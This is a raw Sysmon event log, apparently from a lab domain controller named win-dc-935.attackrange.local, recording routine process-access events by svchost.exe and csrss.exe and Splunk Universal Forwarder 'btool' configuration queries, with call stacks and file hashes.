13:55:52.731{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007036Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007035Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007034Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007033Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007032Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007031Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007030Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007029Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85E8-5FCF-1801-000000009101}876C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007028Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.731{10ACEC4A-85E5-5FCF-0801-000000009101}42803180C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{10ACEC4A-85E8-5FCF-1801-000000009101}876C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+13ac4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007027Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.741{10ACEC4A-85E8-5FCF-1801-000000009101}876C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=3080 10341000x80000000000000007026Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E8-5FCF-1701-000000009101}5056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007025Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007024Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007023Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007022Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007021Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007020Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007019Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007018Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007017Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E8-5FCF-1701-000000009101}5056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007016Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007015Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-85E8-5FCF-1601-000000009101}30483032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85E8-5FCF-1701-000000009101}5056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007014Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.477{10ACEC4A-85E8-5FCF-1701-000000009101}5056C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85E8-5FCF-1601-000000009101}3048C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000007013Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E8-5FCF-1601-000000009101}3048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007012Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007011Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007010Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 